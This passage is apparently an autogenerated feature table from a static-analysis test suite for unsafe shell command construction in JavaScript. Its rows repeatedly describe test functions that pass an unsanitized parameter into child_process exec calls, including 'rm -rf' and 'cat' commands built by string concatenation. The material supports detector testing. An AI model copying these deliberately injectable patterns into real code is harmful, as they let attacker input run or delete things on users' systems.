autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:31 | "cat '/ ... + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:31 | "cat '/ ... + name | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:31 | "cat '/ ... + name | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:31 | "cat '/ ... + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:37 | "cat '/ ... e + "'" | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:37 | "cat '/ ... e + "'" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:37 | "cat '/ ... e + "'" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:37 | "cat '/ ... e + "'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:37 | "cat '/ ... e + "'" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:37 | "cat '/ ... e + "'" | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:37 | "cat '/ ... e + "'" | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:37 | "cat '/ ... e + "'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:10:77:37 | "cat '/ ... e + "'" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:28:77:31 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:28:77:31 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:28:77:31 | name | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:28:77:31 | name | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:28:77:31 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:28:77:31 | name | stringConcatenatedWith | 'cat '/foo/bar' -endpoint- ''' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:35:77:37 | "'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:35:77:37 | "'" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:35:77:37 | "'" | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:35:77:37 | "'" | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:35:77:37 | "'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:77:35:77:37 | "'" | stringConcatenatedWith | 'cat '/foo/bar' + name -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:3 | cp | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:8 | cp.exec | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:29 | cp.exec ... file") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:29 | cp.exec ... file") | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:29 | cp.exec ... file") | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:29 | cp.exec ... file") | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:29 | cp.exec ... file") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:29 | exceptional return of cp.exec ... file") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:29 | exceptional return of cp.exec ... file") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:29 | exceptional return of cp.exec ... file") | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:29 | exceptional return of cp.exec ... file") | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:2:79:29 | exceptional return of cp.exec ... file") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:5:79:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:5:79:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:5:79:8 | exec | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:5:79:8 | exec | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:5:79:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:10:79:13 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:10:79:13 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:10:79:13 | name | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:10:79:13 | name | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:10:79:13 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:10:79:13 | name | stringConcatenatedWith | -endpoint- ' some file' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:10:79:28 | name + " some file" | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:10:79:28 | name + " some file" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:10:79:28 | name + " some file" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:10:79:28 | name + " some file" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:10:79:28 | name + " some file" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:10:79:28 | name + " some file" | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:10:79:28 | name + " some file" | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:10:79:28 | name + " some file" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:10:79:28 | name + " some file" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:17:79:28 | " some file" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:17:79:28 | " some file" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:17:79:28 | " some file" | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:17:79:28 | " some file" | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:17:79:28 | " some file" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:79:17:79:28 | " some file" | stringConcatenatedWith | name -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:1:82:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:1:82:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:1:82:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:1:82:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:1:82:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:1:82:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:82:1:82:21 | module. ... .arrays | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 